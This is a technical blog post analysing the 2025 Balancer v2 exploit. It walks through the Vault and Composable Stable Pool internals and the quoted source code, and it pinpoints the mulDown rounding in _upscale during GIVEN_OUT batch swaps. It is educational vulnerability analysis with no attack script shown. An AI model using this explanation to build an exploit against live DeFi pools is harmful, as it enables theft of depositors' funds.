Kiprey's Blog

Balancer 128M Exploit Analysis

2025-11-22T16:00:00.000Z

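I. Introduction

On November 3, 2025, an attacker exploited arithmetic precision loss in Balancer's pool invariant calculation and stole $128 million across six blockchain networks in under 30 minutes. I found this attack fascinating, but most of the write-ups available online cover only a narrow slice of the technical details, such as the precision loss around _upscaleArray or one or two adjacent layers of the call chain, which is not very friendly to readers who don't already know Balancer's internals. So I decided to lay out all the relevant details properly, and to use the opportunity to learn the Balancer protocol.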

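II. Balancer Internals

In one sentence: Balancer is a DeFi liquidity pool framework built around automated market makers (AMMs). If that sounds like it told you nothing, don't worry, we'll work through it step by step.

1. What is an AMM

What is an automated market maker? Let's start with the plain market maker: a role that provides liquidity. In stock trading, for example, a wide gap between an instrument's bid and ask prices is bad for users, because they cannot trade at a reasonable price and lose money to the spread. A market maker narrows that gap by quoting orders in the order book at high frequency. If you have traded US equity options you will know this particularly well: options are inherently illiquid, so most of the liquidity on both sides of the book comes from market makers.

Cryptocurrencies run into a similar problem when converting between tokens. A user who wants to buy or sell a large amount needs a venue that can absorb the whole trade. The well-known Uniswap V2 is a classic example: it holds large reserves of TokenA/TokenB pairs and prices swaps by maintaining the invariant x * y = k. Suppose a Uniswap pool has k = 20,000 and currently holds 1000 USDC and 20 ETH; the ETH/USDC price is then 50. If the reserves become 2000 USDC and 10 ETH (note that k is unchanged), the price becomes 200. At a venue like Uniswap the price changes automatically according to a mathematical formula, hence the name automated market maker: a role that both reprices automatically as the market moves and provides enough token liquidity to satisfy trading demand.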
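The Uniswap numbers above can be reproduced with a few lines of Python. This is only a sketch of a fee-less constant-product pool; the function names are mine, and real Uniswap V2 additionally charges a swap fee that is ignored here.

```python
def spot_price(reserve_quote: float, reserve_base: float) -> float:
    """Price of one unit of the base token, quoted in the quote token."""
    return reserve_quote / reserve_base


def amount_out_given_in(reserve_in: float, reserve_out: float, amount_in: float) -> float:
    """Output of a fee-less swap that keeps reserve_in * reserve_out = k."""
    k = reserve_in * reserve_out
    new_reserve_in = reserve_in + amount_in
    new_reserve_out = k / new_reserve_in
    return reserve_out - new_reserve_out


usdc, eth = 1000.0, 20.0                       # k = 20,000
price_before = spot_price(usdc, eth)           # USDC per ETH before the trade
eth_bought = amount_out_given_in(usdc, eth, 1000.0)  # trader pays 1000 USDC
price_after = spot_price(usdc + 1000.0, eth - eth_bought)
print(price_before, eth_bought, price_after)
```

Paying 1000 USDC moves the reserves from (1000, 20) to (2000, 10), which is exactly the price jump from 50 to 200 described in the text.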

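2. Balancer components

According to the Balancer v2 documentation, Balancer consists of two main parts: the Vault and the Pools. One Vault serves many Pools, so an operation that trades across several tokens only needs bookkeeping changes inside the Vault, which avoids redundant transfers and lowers gas costs.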

Vault

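The Vault (pkg/vault/contracts/Vault.sol) is the core of Balancer. It holds and manages all tokens in every Balancer pool, and it is the entry point for most Balancer operations (swaps / joins / exits). Note, however, that the Vault only holds the tokens and does the accounting; it does not contain the pool-specific logic for managing those funds (maintaining the AMM invariant, for example, does not happen in the Vault). That logic lives in the Pools.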

Pools

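Balancer has many pool types. Here is a brief introduction to a few simple or commonly used ones:

Linear Pool: uses a known, stable exchange rate to swap between a base asset and its wrapped yield-bearing token. For example, in Aave, the stablecoin DAI and aDAI (the interest-accruing token that represents a DAI deposit in Aave) can be swapped efficiently through a Linear Pool.
Weighted Pool: an extension of the classic constant-product model (x · y = k) popularized by Uniswap V1.
Composable Stable Pools: pools designed for a group of highly correlated assets that are expected to trade at close to 1:1, or at a known exchange rate. Stablecoins such as USDC, USDT, and DAI are an example: their relative prices barely move, so a low-slippage stable curve suits them well.

A few notes on Composable Stable Pools:

Their goal differs from that of a Linear Pool: a Composable Stable Pool handles swaps among several mutually equivalent stable assets, while a Linear Pool handles swaps between a base asset and its yield-bearing token. The two differ significantly in both mathematical structure and use case.
Composable means that the pool's BPT (Balancer Pool Token, the ERC20 share token a liquidity provider receives after depositing assets into the pool) can itself be used as a composable asset when building other pools. In other words, a pool's LP token can be nested into higher-level pools like any ordinary token, so pools can be freely combined and reference each other, forming larger and more capital-efficient liquidity structures. A Linear Pool also registers its own BPT with the Vault, but that BPT is not necessarily used as a composable asset for building other pools.

3. Balancer interaction flows

We'll use the Vault + Composable Stable Pool combination as the example to walk through some of Balancer's interaction flows.

Creating a Composable Stable Pool contract

Let's first look at how the Vault and a pool interact when a pool is created, and which state variables are involved.

To create a new Composable Stable Pool, anyone can call the create function of the ComposableStablePoolFactory contract (pkg/pool-stable/contracts/ComposableStablePoolFactory.sol), which deploys a new ComposableStablePool contract.

The ComposableStablePool constructor then automatically calls vault.registerPool and vault.registerTokens to register the pool and its tokens with the Vault. Note that the registered tokens include not only the underlying assets given at creation time but also the pool's own address (because the pool is its own BPT).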

// pkg/pool-stable/contracts/ComposableStablePool.sol
constructor(NewPoolParams memory params)
    BasePool(
        params.vault,
        IVault.PoolSpecialization.GENERAL,
        params.name,
        params.symbol,
        _insertSorted(params.tokens, IERC20(this)), // <------
        new address[](params.tokens.length + 1), // <------
        params.swapFeePercentage,
        params.pauseWindowDuration,
        params.bufferPeriodDuration,
        params.owner
    )
    StablePoolAmplification(params.amplificationParameter)
    ComposableStablePoolStorage(_extractStorageParams(params))
    ComposableStablePoolRates(_extractRatesParams(params))
    ProtocolFeeCache(
        params.protocolFeeProvider,
        ProviderFeeIDs({ swap: ProtocolFeeType.SWAP, yield: ProtocolFeeType.YIELD, aum: ProtocolFeeType.AUM })
    )
{
    _version = params.version;
}

// pkg/pool-utils/contracts/lib/PoolRegistrationLib.sol
function _registerPool(
    IVault vault,
    IVault.PoolSpecialization specialization,
    IERC20[] memory tokens,
    address[] memory assetManagers
) private returns (bytes32) {
    bytes32 poolId = vault.registerPool(specialization);

    // We don't need to check that tokens and assetManagers have the same length, since the Vault already performs
    // that check.
    vault.registerTokens(poolId, tokens, assetManagers);

    return poolId;
}

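A quick word on PoolSpecialization: it determines which callback interface the Vault uses when it calls the pool for a swap, which affects the pool's gas cost and the range of features it can support:

General is the most flexible and suits pools that need access to all token balances and complex math.
Minimal Swap Info reduces the amount of callback data while keeping the functionality, and is commonly used by AMMs such as Weighted Pools that do not need the full state.
Two Token further restricts the pool to exactly two assets in exchange for the lowest swap gas cost.

Each pool type picks the specialization that best balances functionality and performance for its invariant calculation and expected swap complexity. The PoolSpecialization is hard-coded in each pool's constructor; ComposableStablePool sets it to GENERAL.

On the Vault side, calls from a General pool trigger some computation and state updates. First, in registerPool the Vault computes a unique pool ID for the pool and records it in _isPoolRegistered: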

// pkg/vault/contracts/PoolRegistry.sol
function registerPool(PoolSpecialization specialization)
    external
    override
    nonReentrant
    whenNotPaused
    returns (bytes32)
{
    // Each Pool is assigned a unique ID based on an incrementing nonce. This assumes there will never be more than
    // 2**80 Pools, and the nonce will not overflow.

    bytes32 poolId = _toPoolId(msg.sender, specialization, uint80(_nextPoolNonce));

    _require(!_isPoolRegistered[poolId], Errors.INVALID_POOL_ID); // Should never happen as Pool IDs are unique.
    _isPoolRegistered[poolId] = true;

    _nextPoolNonce += 1;

    // Note that msg.sender is the pool's contract
    emit PoolRegistered(poolId, msg.sender, specialization);
    return poolId;
}
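To make the pool ID less abstract, here is a sketch of how the three inputs of _toPoolId could be packed into 32 bytes. The layout (20-byte pool address, then 2-byte specialization, then 10-byte nonce) is my reading of the Vault and should be treated as an assumption, as should the enum values and the placeholder address; the helper names are hypothetical.

```python
# Assumed enum values of IVault.PoolSpecialization
GENERAL, MINIMAL_SWAP_INFO, TWO_TOKEN = 0, 1, 2


def to_pool_id(pool_address: int, specialization: int, nonce: int) -> bytes:
    """Pack address (160 bits) | specialization (16 bits) | nonce (80 bits)."""
    assert pool_address < 2**160 and specialization < 2**16 and nonce < 2**80
    packed = (pool_address << 96) | (specialization << 80) | nonce
    return packed.to_bytes(32, "big")


def from_pool_id(pool_id: bytes):
    """Inverse of to_pool_id: returns (pool_address, specialization, nonce)."""
    value = int.from_bytes(pool_id, "big")
    return value >> 96, (value >> 80) & 0xFFFF, value & (2**80 - 1)


# Placeholder address, not a real pool
example_pool = int("11" * 20, 16)
example_id = to_pool_id(example_pool, GENERAL, 7)
print(example_id.hex())
```

Under this layout the pool address can be read straight off the first 20 bytes of a pool ID, and the incrementing nonce guarantees uniqueness even if one contract registered more than once.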

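Second, registerTokens sets _poolAssetManagers and _generalPoolsBalances. Both of these variables are mappings used to store per-pool data: the former holds the address of the manager allowed to deposit, withdraw, or update the balance of a given token in the pool, and the latter holds that token's balance state for the pool as tracked by the Vault. So it really is the Vault that records how much of each token a pool holds, which is also what makes swaps convenient.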

// pkg/vault/contracts/PoolTokens.sol
function registerTokens(
    bytes32 poolId,
    IERC20[] memory tokens,
    address[] memory assetManagers
) external override nonReentrant whenNotPaused onlyPool(poolId) {
    InputHelpers.ensureInputLengthMatch(tokens.length, assetManagers.length);

    // Validates token addresses and assigns Asset Managers
    for (uint256 i = 0; i < tokens.length; ++i) {
        IERC20 token = tokens[i];
        _require(token != IERC20(0), Errors.INVALID_TOKEN);

        _poolAssetManagers[poolId][token] = assetManagers[i];
    }

    PoolSpecialization specialization = _getPoolSpecialization(poolId);
    if (specialization == PoolSpecialization.TWO_TOKEN) {
        _require(tokens.length == 2, Errors.TOKENS_LENGTH_MUST_BE_2);
        _registerTwoTokenPoolTokens(poolId, tokens[0], tokens[1]);
    } else if (specialization == PoolSpecialization.MINIMAL_SWAP_INFO) {
        _registerMinimalSwapInfoPoolTokens(poolId, tokens);
    } else {
        // PoolSpecialization.GENERAL
        _registerGeneralPoolTokens(poolId, tokens); // <-------
    }

    emit TokensRegistered(poolId, tokens, assetManagers);
}

// pkg/vault/contracts/balances/GeneralPoolsBalance.sol
function _registerGeneralPoolTokens(bytes32 poolId, IERC20[] memory tokens) internal {
    EnumerableMap.IERC20ToBytes32Map storage poolBalances = _generalPoolsBalances[poolId];

    for (uint256 i = 0; i < tokens.length; ++i) {
        // EnumerableMaps require an explicit initial value when creating a key-value pair: we use zero, the same
        // value that is found in uninitialized storage, which corresponds to an empty balance.
        bool added = poolBalances.set(tokens[i], 0);
        _require(added, Errors.TOKEN_ALREADY_REGISTERED);
    }
}

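This brings us to how pool balances are stored in the Vault. For each pool and token, _generalPoolsBalances stores the balance as a single bytes32 that contains three fields:

cash (112 bits): the amount of the token the pool currently holds inside the Vault
managed (112 bits): the amount the pool's Asset Manager has withdrawn from the Vault and holds externally
lastChangeBlock (32 bits): the block number of the last balance change, used to guard against sandwich attacks

The point of this design is to let liquidity earn more yield while the AMM keeps working normally. In the early Uniswap model, maintaining x·y = k meant locking essentially all liquidity inside the contract, so it could not be invested externally and earned nothing extra. Balancer's architecture lets an Asset Manager move part of the funds out of the Vault for lending, investing, or other yield strategies. The pool's total balance is still total = cash + managed, but the managed part can be put to work to earn additional yield; the cash amount held in the Vault is only updated on events such as swaps, joins, or exits. This keeps the AMM usable while improving overall capital efficiency.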
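A minimal sketch of such a packed balance follows. The field widths (112 + 112 + 32 = 256 bits) come from the description above; the bit order (cash in the low bits, lastChangeBlock in the high bits) and all function names are assumptions made for illustration.

```python
MASK_112 = 2**112 - 1
MASK_32 = 2**32 - 1


def to_balance(cash: int, managed: int, last_change_block: int) -> int:
    """Pack the three fields into one 256-bit word (assumed bit order)."""
    assert cash <= MASK_112 and managed <= MASK_112 and last_change_block <= MASK_32
    return (last_change_block << 224) | (managed << 112) | cash


def get_cash(balance: int) -> int:
    return balance & MASK_112


def get_managed(balance: int) -> int:
    return (balance >> 112) & MASK_112


def get_last_change_block(balance: int) -> int:
    return (balance >> 224) & MASK_32


def get_total(balance: int) -> int:
    """What the pool sees as its balance: total = cash + managed."""
    return get_cash(balance) + get_managed(balance)


def increase_cash(balance: int, amount: int, current_block: int) -> int:
    """A swap or join adds to cash only and refreshes lastChangeBlock."""
    return to_balance(get_cash(balance) + amount, get_managed(balance), current_block)


packed = to_balance(100, 50, 12345)
after_swap = increase_cash(packed, 10, 12346)
print(get_total(packed), get_total(after_swap))
```

Keeping all three fields in one storage word means a balance update costs a single storage write, which fits the gas-saving theme of the Vault design.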

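Adding liquidity

When a Liquidity Provider (LP) wants to add liquidity to a pool, the LP calls joinPool on the Vault. vault.joinPool calls the onJoinPool function of the specific pool (removing liquidity goes through vault.exitPool and pool.onExitPool respectively). The code for onJoinPool / onExitPool is shown below. Both are inherited by every pool type; each pool type implements the _onInitializePool / _onJoinPool / _onExitPool hooks to compute the amounts flowing in and out, but the minting and burning of BPT happens here: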

// pkg/pool-utils/contracts/BasePool.sol
/**
 * @notice Vault hook for adding liquidity to a pool (including the first time, "initializing" the pool).
 * @dev This function can only be called from the Vault, from `joinPool`.
 */
function onJoinPool(
    bytes32 poolId,
    address sender,
    address recipient,
    uint256[] memory balances,
    uint256 lastChangeBlock,
    uint256 protocolSwapFeePercentage,
    bytes memory userData
) external override onlyVault(poolId) returns (uint256[] memory, uint256[] memory) {
    _beforeSwapJoinExit();

    uint256[] memory scalingFactors = _scalingFactors();

    if (totalSupply() == 0) {
        (uint256 bptAmountOut, uint256[] memory amountsIn) = _onInitializePool(
            poolId,
            sender,
            recipient,
            scalingFactors,
            userData
        );

        // On initialization, we lock _getMinimumBpt() by minting it for the zero address. This BPT acts as a
        // minimum as it will never be burned, which reduces potential issues with rounding, and also prevents the
        // Pool from ever being fully drained.
        _require(bptAmountOut >= _getMinimumBpt(), Errors.MINIMUM_BPT);
        _mintPoolTokens(address(0), _getMinimumBpt());
        _mintPoolTokens(recipient, bptAmountOut - _getMinimumBpt());

        // amountsIn are amounts entering the Pool, so we round up.
        _downscaleUpArray(amountsIn, scalingFactors);

        return (amountsIn, new uint256[](balances.length));
    } else {
        _upscaleArray(balances, scalingFactors);
        (uint256 bptAmountOut, uint256[] memory amountsIn) = _onJoinPool(
            poolId,
            sender,
            recipient,
            balances,
            lastChangeBlock,
            inRecoveryMode() ? 0 : protocolSwapFeePercentage, // Protocol fees are disabled while in recovery mode
            scalingFactors,
            userData
        );

        // Note we no longer use `balances` after calling `_onJoinPool`, which may mutate it.

        _mintPoolTokens(recipient, bptAmountOut);

        // amountsIn are amounts entering the Pool, so we round up.
        _downscaleUpArray(amountsIn, scalingFactors);

        // This Pool ignores the `dueProtocolFees` return value, so we simply return a zeroed-out array.
        return (amountsIn, new uint256[](balances.length));
    }
}

/**
 * @notice Vault hook for removing liquidity from a pool.
 * @dev This function can only be called from the Vault, from `exitPool`.
 */
function onExitPool(
    bytes32 poolId,
    address sender,
    address recipient,
    uint256[] memory balances,
    uint256 lastChangeBlock,
    uint256 protocolSwapFeePercentage,
    bytes memory userData
) external override onlyVault(poolId) returns (uint256[] memory, uint256[] memory) {
    uint256[] memory amountsOut;
    uint256 bptAmountIn;

    // When a user calls `exitPool`, this is the first point of entry from the Vault.
    // We first check whether this is a Recovery Mode exit - if so, we proceed using this special lightweight exit
    // mechanism which avoids computing any complex values, interacting with external contracts, etc., and generally
    // should always work, even if the Pool's mathematics or a dependency break down.
    if (userData.isRecoveryModeExitKind()) {
        // This exit kind is only available in Recovery Mode.
        _ensureInRecoveryMode();

        // Note that we don't upscale balances nor downscale amountsOut - we don't care about scaling factors during
        // a recovery mode exit.
        (bptAmountIn, amountsOut) = _doRecoveryModeExit(balances, totalSupply(), userData);
    } else {
        // Note that we only call this if we're not in a recovery mode exit.
        _beforeSwapJoinExit();

        uint256[] memory scalingFactors = _scalingFactors();
        _upscaleArray(balances, scalingFactors);

        (bptAmountIn, amountsOut) = _onExitPool(
            poolId,
            sender,
            recipient,
            balances,
            lastChangeBlock,
            inRecoveryMode() ? 0 : protocolSwapFeePercentage, // Protocol fees are disabled while in recovery mode
            scalingFactors,
            userData
        );

        // amountsOut are amounts exiting the Pool, so we round down.
        _downscaleDownArray(amountsOut, scalingFactors);
    }

    // Note we no longer use `balances` after calling `_onExitPool`, which may mutate it.

    _burnPoolTokens(sender, bptAmountIn);

    // This Pool ignores the `dueProtocolFees` return value, so we simply return a zeroed-out array.
    return (amountsOut, new uint256[](balances.length));
}
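Note the rounding directions in the two hooks above: amounts entering the pool are downscaled rounding up, amounts leaving it are downscaled rounding down, so the rounding error always stays with the pool. A small sketch of that convention in 18-decimal fixed point (the helper names mirror the Solidity ones, but this is my own simplified version, not the library code):

```python
ONE = 10**18  # 1.0 in 18-decimal fixed point


def div_down(a: int, b: int) -> int:
    """Fixed-point a / b, rounded toward zero."""
    return a * ONE // b


def div_up(a: int, b: int) -> int:
    """Fixed-point a / b, rounded away from zero."""
    return 0 if a == 0 else (a * ONE - 1) // b + 1


def downscale_down(amount: int, scaling_factor: int) -> int:
    """Used for amounts leaving the pool (exits): the user receives no more than exact."""
    return div_down(amount, scaling_factor)


def downscale_up(amount: int, scaling_factor: int) -> int:
    """Used for amounts entering the pool (joins): the user pays no less than exact."""
    return div_up(amount, scaling_factor)


factor = 11 * 10**17                   # hypothetical scaling factor of 1.1
print(downscale_down(10, factor))      # exact value is 9.09...
print(downscale_up(10, factor))
```

The two functions only differ when the division is inexact, and in that case they differ by exactly one unit.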

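Swaps

In Balancer, users swap tokens through the Vault's swap and batchSwap functions without having to trust the Pool contract directly, because all security checks are performed by the Vault. swap performs a single token exchange; batchSwap executes several exchanges in order within one transaction and supports chained, multihop swaps.

Every swap has a tokenIn and a tokenOut: the former is sent by the user to the pool, the latter is sent by the pool to the recipient. Depending on the user's intent, swaps come in two kinds:

GIVEN_IN: the input amount is fixed, and the pool computes the output amount in its onSwap hook
GIVEN_OUT: the output amount is fixed, and the pool computes the required input amount in its onSwap hook

Note: although a batchSwap involves multiple swaps, they all share one kind: either every swap is GIVEN_IN or every swap is GIVEN_OUT. The SwapKind is passed by the user as an argument to batchSwap, so swaps of different kinds are never mixed within one batchSwap.

No matter how many swaps are performed, the Vault finishes all intermediate calculations first and settles the net token movements once at the very end, which saves a significant amount of gas, especially for multihop swaps or swaps across several pools.

In a multihop swap (for example a TokenA/TokenB swap followed by a TokenB/TokenC swap), a later step can set its amount to 0, which makes it use the amount calculated by the previous step. This simplifies things: the user does not have to work out the amount for every individual swap.

Note: the user is responsible for ordering the swaps correctly for the chosen SwapKind. For example, given the two pairs TokenA/TokenB and TokenB/TokenC:

To swap 100 TokenA for TokenC, set
- SwapKind to GIVEN_IN
- SwapSteps to 100 TokenA/TokenB -> 0 TokenB/TokenC. This swaps 100 TokenA for TokenB and then swaps all of the TokenB received for TokenC (the amount of the second step, TokenB/TokenC, is set to 0 to mean "use the result of the previous step").
To obtain exactly 100 TokenC by paying TokenA, set
- SwapKind to GIVEN_OUT
- SwapSteps to 100 TokenB/TokenC -> 0 TokenA/TokenB. This works backwards: first compute how many TokenB are needed to get 100 TokenC, then use that TokenB amount to compute how many TokenA must be provided.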
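The chaining rule (amount 0 means "reuse the previous step's result") and the reversed step order for GIVEN_OUT can be sketched as below. The Pool class is a hypothetical fee-less constant-product stand-in, not a Balancer pool, and batch_swap is a simplification that ignores limits, deadlines, and the final net settlement.

```python
from dataclasses import dataclass


@dataclass
class Pool:
    """Hypothetical fee-less constant-product pool, used only as a stand-in."""
    reserves: dict  # token symbol -> reserve

    def out_given_in(self, token_in: str, token_out: str, amount_in: float) -> float:
        x, y = self.reserves[token_in], self.reserves[token_out]
        return y - (x * y) / (x + amount_in)

    def in_given_out(self, token_in: str, token_out: str, amount_out: float) -> float:
        x, y = self.reserves[token_in], self.reserves[token_out]
        return (x * y) / (y - amount_out) - x


def batch_swap(kind: str, steps: list) -> float:
    """steps: (pool, token_in, token_out, amount); amount 0 chains the previous result.

    Reserves are not updated here because each pool is used only once per batch.
    """
    previous = None
    for pool, token_in, token_out, amount in steps:
        given = previous if amount == 0 else amount
        if kind == "GIVEN_IN":
            previous = pool.out_given_in(token_in, token_out, given)
        else:  # GIVEN_OUT
            previous = pool.in_given_out(token_in, token_out, given)
    return previous


pool_ab = Pool({"A": 1000.0, "B": 1000.0})
pool_bc = Pool({"B": 1000.0, "C": 1000.0})

# GIVEN_IN: steps follow the trade direction, A -> B -> C.
c_received = batch_swap("GIVEN_IN", [(pool_ab, "A", "B", 100.0), (pool_bc, "B", "C", 0)])

# GIVEN_OUT: steps are listed backwards, starting from the desired 100 C.
a_required = batch_swap("GIVEN_OUT", [(pool_bc, "B", "C", 100.0), (pool_ab, "A", "B", 0)])
print(c_received, a_required)
```

Feeding a_required back in as a GIVEN_IN trade returns 100 TokenC, which is a quick way to convince yourself that the two orderings describe the same route from opposite ends.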

Because batchSwap has to support both kinds of swap, a pool must implement, for each direction, an amount calculation that rounds in the protocol's favor. The call path is: batchSwap → _swapWithPools → _swapWithPool → _processGeneralPoolSwapRequest → BaseGeneralPool.onSwap → BaseGeneralPool._swapGivenIn/_swapGivenOut → the _swapGivenIn/_swapGivenOut hooks implemented by each concrete pool. BaseGeneralPool._swapGivenIn/_swapGivenOut can be overridden, and ComposableStablePool does exactly that in order to special-case swaps that involve BPT.

As an aside, for a General pool such as ComposableStablePool, the pool balances the Vault operates on during a swap are the _generalPoolsBalances state variable introduced earlier. The following code gives a quick view of how the accounting works:

// pkg/vault/contracts/Swaps.sol
function _processGeneralPoolSwapRequest(IPoolSwapStructs.SwapRequest memory request, IGeneralPool pool)
    private
    returns (uint256 amountCalculated)
{
    bytes32 tokenInBalance;
    bytes32 tokenOutBalance;

    // We access both token indexes without checking existence, because we will do it manually immediately after.
    EnumerableMap.IERC20ToBytes32Map storage poolBalances = _generalPoolsBalances[request.poolId];
    uint256 indexIn = poolBalances.unchecked_indexOf(request.tokenIn);
    uint256 indexOut = poolBalances.unchecked_indexOf(request.tokenOut);

    if (indexIn == 0 || indexOut == 0) {
        // The tokens might not be registered because the Pool itself is not registered. We check this to provide a
        // more accurate revert reason.
        _ensureRegisteredPool(request.poolId);
        _revert(Errors.TOKEN_NOT_REGISTERED);
    }

    // EnumerableMap stores indices *plus one* to use the zero index as a sentinel value - because these are valid,
    // we can undo this.
    indexIn -= 1;
    indexOut -= 1;

    uint256 tokenAmount = poolBalances.length();
    uint256[] memory currentBalances = new uint256[](tokenAmount);

    request.lastChangeBlock = 0;
    for (uint256 i = 0; i < tokenAmount; i++) {
        // Because the iteration is bounded by `tokenAmount`, and no tokens are registered or deregistered here, we
        // know `i` is a valid token index and can use `unchecked_valueAt` to save storage reads.
        bytes32 balance = poolBalances.unchecked_valueAt(i);

        currentBalances[i] = balance.total();
        request.lastChangeBlock = Math.max(request.lastChangeBlock, balance.lastChangeBlock());

        if (i == indexIn) {
            tokenInBalance = balance;
        } else if (i == indexOut) {
            tokenOutBalance = balance;
        }
    }

    // Perform the swap request callback and compute the new balances for 'token in' and 'token out' after the swap
    amountCalculated = pool.onSwap(request, currentBalances, indexIn, indexOut);
    (uint256 amountIn, uint256 amountOut) = _getAmounts(request.kind, request.amount, amountCalculated);
    tokenInBalance = tokenInBalance.increaseCash(amountIn);
    tokenOutBalance = tokenOutBalance.decreaseCash(amountOut);

    // Because no tokens were registered or deregistered between now or when we retrieved the indexes for
    // 'token in' and 'token out', we can use `unchecked_setAt` to save storage reads.
    poolBalances.unchecked_setAt(indexIn, tokenInBalance);
    poolBalances.unchecked_setAt(indexOut, tokenOutBalance);
}

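III. Vulnerability Analysis

Let's look at how the vulnerability is triggered. First clone the balancer/balancer-v2-monorepo repository and check out commit 88842344fb5f44d8ed6f8f944acd3be80627df87.

Note that the latest Balancer version is v3, so GitHub also hosts a separate v3 repository, but the vulnerability is in v2; don't mix them up. This commit was the latest as of 2025/11/20: two weeks after the attack, the patch had still not been pushed.

1. The vulnerable code

The previous section described Balancer's interaction flows in detail, so the operations and variables involved should be reasonably clear by now and the vulnerability is no longer hard to follow. It is actually quite simple: when a user calls vault.batchSwap with SwapKind.GIVEN_OUT, and the swap goes through a ComposableStablePool with neither tokenIn nor tokenOut being the BPT, the base-class BaseGeneralPool._swapGivenOut is what computes the required tokenIn amount: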

// pkg/pool-stable/contracts/ComposableStablePool.sol
/**
 * @dev Override this hook called by the base class `onSwap`, to check whether we are doing a regular swap,
 * or a swap involving BPT, which is equivalent to a single token join or exit. Since one of the Pool's
 * tokens is the preminted BPT, we need to handle swaps where BPT is involved separately.
 *
 * At this point, the balances are unscaled. The indices and balances are coming from the Vault, so they
 * refer to the full set of registered tokens (including BPT).
 *
 * If this is a swap involving BPT, call `_swapWithBpt`, which computes the amountOut using the swapFeePercentage
 * and charges protocol fees, in the same manner as single token join/exits. Otherwise, perform the default
 * processing for a regular swap.
 */
function _swapGivenOut(
    SwapRequest memory swapRequest,
    uint256[] memory registeredBalances,
    uint256 registeredIndexIn,
    uint256 registeredIndexOut,
    uint256[] memory scalingFactors
) internal virtual override returns (uint256) {
    return
        (swapRequest.tokenIn == IERC20(this) || swapRequest.tokenOut == IERC20(this))
            ? _swapWithBpt(swapRequest, registeredBalances, registeredIndexIn, registeredIndexOut, scalingFactors)
            : super._swapGivenOut( // <------ [1]
                swapRequest,
                registeredBalances,
                registeredIndexIn,
                registeredIndexOut,
                scalingFactors
            );
}

// pkg/pool-utils/contracts/BaseGeneralPool.sol
function _swapGivenOut(
    SwapRequest memory swapRequest,
    uint256[] memory balances,
    uint256 indexIn,
    uint256 indexOut,
    uint256[] memory scalingFactors
) internal virtual returns (uint256) {
    _upscaleArray(balances, scalingFactors);
    swapRequest.amount = _upscale(swapRequest.amount, scalingFactors[indexOut]); // <---- [2]

    uint256 amountIn = _onSwapGivenOut(swapRequest, balances, indexIn, indexOut);

    // amountIn tokens are entering the Pool, so we round up.
    amountIn = _downscaleUp(amountIn, scalingFactors[indexIn]);

    // Fees are added after scaling happens, to reduce the complexity of the rounding direction analysis.
    return _addSwapFeeAmount(amountIn);
}

// pkg/solidity-utils/contracts/helpers/ScalingHelpers.sol
/**
 * @dev Applies `scalingFactor` to `amount`, resulting in a larger or equal value depending on whether it needed
 * scaling or not.
 */
function _upscale(uint256 amount, uint256 scalingFactor) pure returns (uint256) {
    // Upscale rounding wouldn't necessarily always go in the same direction: in a swap for example the balance of
    // token in should be rounded up, and that of token out rounded down. This is the only place where we round in
    // the same direction for all amounts, as the impact of this rounding is expected to be minimal.
    return FixedPoint.mulDown(amount, scalingFactor); // <----- [3]
}

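As the code shows, even when it is computing the required tokenIn amount for a GIVEN_OUT swap, BaseGeneralPool._swapGivenOut still upscales with mulDown. In the GIVEN_OUT context, however, mulDown favors the user rather than the protocol: swapRequest.amount here is the number of tokenOut the user wants, and if _upscale undervalues it, there is no guarantee that the user pays enough.

For example, in a TokenB/TokenC swap, amount = 100 means the user wants 100 TokenC, and the pool uses it to compute how many TokenB the user must provide. If amount is rounded down, the amount of TokenB that must be transferred from the user into the Vault shrinks with it.

This is the key code of the vulnerability. The comment, though, shows the developers were convinced the effect would be negligible (the impact of this rounding is expected to be minimal). So how did a supposedly negligible effect lead to such a large theft? That takes a careful look at a few key points. Let's first trace how scalingFactor is computed.

In ComposableStablePool, the computed scalingFactor equals the token's decimals-based scaling factor multiplied by its token rate. The result is a fractional value in 1e18 fixed-point precision, and the final step of FixedPoint.mulDown inside _upscale divides that 1e18 precision back out.

For example, if _scalingFactor0 is 1e18 and tokenRate0 is 1.1e18, _scalingFactors returns 1.1e18.
Now call _upscale with a tiny amount, for example _upscale(9, 1.1e18): the result is floor(9.9e18 / 1e18) = 9. The calculation drops 0.9, which is roughly a 9% loss relative to the exact value 9.9.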

// pkg/pool-stable/contracts/ComposableStablePoolRates.sol
/**
 * @dev Overrides scaling factor getter to compute the tokens' rates.
 */
function _scalingFactors() internal view virtual override returns (uint256[] memory) {
    // There is no need to check the arrays length since both are based on `_getTotalTokens`
    uint256 totalTokens = _getTotalTokens();
    uint256[] memory scalingFactors = new uint256[](totalTokens);

    for (uint256 i = 0; i < totalTokens; ++i) {
        scalingFactors[i] = _getScalingFactor(i).mulDown(_getTokenRate(i)); // <---
    }

    return scalingFactors;
}
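The truncation in the _upscale(9, 1.1e18) example is easy to reproduce with integer arithmetic. The sketch below re-implements mulDown and a rounding-up counterpart in Python (simplified versions written for this post, not the library code) and measures the relative loss for a tiny and a large amount.

```python
from fractions import Fraction

ONE = 10**18  # 1.0 in 18-decimal fixed point


def mul_down(a: int, b: int) -> int:
    """Fixed-point a * b, rounded toward zero."""
    return a * b // ONE


def mul_up(a: int, b: int) -> int:
    """Fixed-point a * b, rounded away from zero."""
    product = a * b
    return 0 if product == 0 else (product - 1) // ONE + 1


def upscale(amount: int, scaling_factor: int) -> int:
    """Same rounding choice as _upscale in the listing: always mulDown."""
    return mul_down(amount, scaling_factor)


def relative_loss(amount: int, scaling_factor: int) -> Fraction:
    """Share of the exact product that the truncation throws away."""
    exact = amount * scaling_factor
    return Fraction(exact - upscale(amount, scaling_factor) * ONE, exact)


# decimals factor 1e18 times token rate 1.1e18, as in the example
scaling_factor = mul_down(10**18, 11 * 10**17)

print(upscale(9, scaling_factor), mul_up(9, scaling_factor))
print(float(relative_loss(9, scaling_factor)))
print(float(relative_loss(9 * 10**18, scaling_factor)))
```

For 9 wei the truncation discards 1/11 of the value, while for 9e18 wei it discards nothing, which is why the loss only matters once balances and amounts have been pushed down to a handful of wei.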

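But stopping here is not enough; this is not the core of the attack. First, although _upscale does lose noticeable precision when amount is a tiny value like 9, a value of 9 literally means 9 wei. If the attacker gained only 1 wei per swap, that would not even cover the gas of a single swap, which is probably why the _upscale developers were confident the impact was minimal. Second, multiplying by tokenRate in _scalingFactors is not wrong in itself either: Linear Pool has similar logic, yet Linear Pools were not affected by this attack: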

// pkg/pool-linear/contracts/LinearPool.sol
function _scalingFactor(IERC20 token) internal view virtual returns (uint256) {
    if (token == _mainToken) {
        return _scalingFactorMainToken;
    } else if (token == _wrappedToken) {
        // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token
        // increases in value.
        return _scalingFactorWrappedToken.mulDown(_getWrappedTokenRate()); // <--------
    } else if (token == this) {
